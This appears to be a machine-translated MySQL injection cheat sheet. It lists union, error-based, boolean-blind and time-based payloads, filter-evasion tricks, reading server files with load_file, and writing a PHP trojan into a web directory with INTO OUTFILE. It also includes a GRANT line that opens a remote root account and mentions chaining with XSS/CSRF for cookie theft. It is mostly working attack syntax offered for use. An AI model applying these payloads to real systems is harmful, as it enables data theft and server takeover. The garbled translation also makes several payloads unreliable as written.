MySQL Injection summary

SELECT first_name, last_name FROM users WHERE user_id = ‘$id‘

1, id=1 ' or 1=1--this can query all the information, where "--" represents a comment, the content behind it will be the comment content, note :--there will be a space behind

The comment characters are also: # and/*

Directory:

0x00 MySQL General injection (SELECT)

0x01 MySQL General injection (INSERT, UPDATE)

0x02 MySQL Error injection

0x03 MySQL General Blinds

0x04 MySQL Time blind

0x05 MySQL Other injection tips

0x06 MySQL Database version features

Body:

0x00 MySQL General injection (SELECT)

1. Annotation characters

#
/*
--

2. Filter Space Injection

Use/**/or () or + instead of spaces

%0c = form feed, new page
%09 = Horizontal Tab
%0d = carriage return
%0a = line feeds, new line

3. More than one data display

Concat ()
Group_concat ()
Concat_ws ()

4. Related functions

System_user () system user name
User () Username
Current_User Current user Name
Session_user () User name of the connection database
Database () name
Version () MySQL database versions
Load_file () mysql read local file function
@ @datadir Read database path
@ @basedir MYSQL Installation path
@ @version_compile_os Operating system Windows Server 2003

GRANT all privileges on * * to ' root ' @ '% ' identified by ' 123456 ' with GRANT OPTION;

5.mysql General Injection Statement

Guess number of fields

ORDER BY n/*

View MySQL basic information

and 1=2 Union Select 1,2,3,CONCAT_WS (char (32,58,32), 0x7c,user (), Database (), version ()), 5,6,7/*

Querying the database

and 1=2 Union select 1,schema_name,3,4 from Information_schema.schemata limit 1,1/*

and 1=2 Union Select 1,group_concat (schema_name), 3,4 from information_schema.schemata/*

Query table name

and 1=2 Union select 1,2,3,4,table_name,5 from Information_schema.tables where table_schema= database 16 encoding limit 1,1/*

and 1=2 Union SELECT 1,2,3,4,GROUP_CONCAT (TABLE_NAME), 5 from Information_schema.tables where table_schema= database 16 encoding/*

Query fields

and 1=2 Union select 1,2,3,4,column_name,5,6,7 from information_schema.columns where table_name= table name hexadecimal encoding and Table_ Schema= database 16-Encoding limit 1,1/*

and 1=2 Union Select 1,2,3,4,group_concat (column_name), 5,6,7 from Information_schema.columns where table_name= The hexadecimal encoding of the table name and the 16 encoding of the database table_schema=/*

Querying data

and 1=2 Union Select, Field 1, 5, field 2,7,8 from database. Table/*

Determine if you have read and write permissions

and (select COUNT (*) from Mysql.user) >0/*

and (select COUNT (File_priv) from Mysql.user) >0/*

6.mysql Read Write file

Required Conditions:

READ: File permission Prerequisites

Write: 1. Absolute path 2.union use 3. You can use the '

-------------------------Read----------------------

mysql3.x Read method

Create Table A (cmd text);

Load data infile ' c:\\xxx\\xxx\\xxx.txt ' into table A;

SELECT * from A;

mysql4.x Read method

In addition to the above method can also use Load_file ()

Create Table A (cmd text);

Insert into a (CMD) VALUES (load_file (' c:\\ddd\\ddd\\ddd.txt '));

SELECT * from A;

mysql5.x Read method

Both of the above can be

Tips for reading files:

Load_file (char (32,26,56,66))

Load_file (0x633a5c626f6f742e696e69)

------------Write--------------------------

into outfile writing files

Union Select 1,2,3,char (where you write a Trojan code converted into 10 binary or 16 binary), 5,6,7,8,9,10,7 into outfile ' d:\web\90team.php '/*

Union Select 1,2,3,load_file (' d:\web\logo123.jpg '), 5,6,7,8,9,10,7 into outfile ' d:\web\90team.php '/*

0x01 MySQL General injection (INSERT, UPDATE)

MySQL General request mysql_query does not support multi-statement execution, MYSQLI can.

Insert injection multiple use error injection!

1. If you can directly insert the administrator can use directly!

Insert into User (Username,password) VALUES (' xxxx ', ' xxxx '), (' dddd ', ' dddd ')/* ');

2. If you can insert some data, the data will be displayed on the Web page, we can combine XXS and csrf to obtain cookies or Getshell

Update injection Ibid.

0x02 MySQL Error injection

1. and (select 1 from (SELECT COUNT (*), concat (SELECT (statement)) from Information_schema.tables limit 0,1), floor (rand (0 ) x from Information_schema.tables Group by X) a) and 1=1

The statement is filled in a general sentence, such as: SELECT distinct concat (0x7e,0x27,schema_name,0x27,0x7e) from Information_schema.schemata LIMIT 0,1

2. and+1= (select+*+from+ (select+name_const (statement), 1), Name_const ((statement), 1))--

3.update web_ids set host= ' www.0x50sec.org ' where ID =1 and (select 1 from (SELECT COUNT (*), concat (rand (0), (subst Ring ((Select (statement)), 1,62))))) (A from Information_schema.tables group by a) b);

4.insert into Web_ids (host) VALUES ((select (1) from Mysql.user where 1=1 and (select 1 from (SELECT COUNT (*), concat ( RAND (0) * *), (substring ((Select (statement)), 1,62))) (A from Information_schema.tables group by a) b)));

0x03 MySQL General Blinds

Using ASCII

and ASCII (substring ((SELECT password from users where id=1), 1, 1) =49

Using regular expressions

and 1= (SELECT 1 from information_schema.tables WHERE table_schema= "Blind_sqli" and table_name REGEXP ' ^[a-n] ' LIMIT 0,1)

0x04 MySQL Time blind

1170 Union Select if (substring (current,1,1) =char (one), Benchmark (5000000,encode (' msg ', ' by 5 seconds '), null) from ( Select Database () as current) as TBL

UNION SELECT IF (SUBSTRING (password,1,1) = ' A ', BENCHMARK (100000,SHA1 (1)), 0) User,password from mysql.user WHERE User = ' Root

0x05 MySQL Other injection tips

Later met the update

0x06 MySQL Database version features

1. mysql5.0 After the Information.schema library appears

2. mysql5.1 after the UDF is imported into the xx\lib\plugin\ directory

3.mysql5.x after the system executes the command

MySQL Injection summary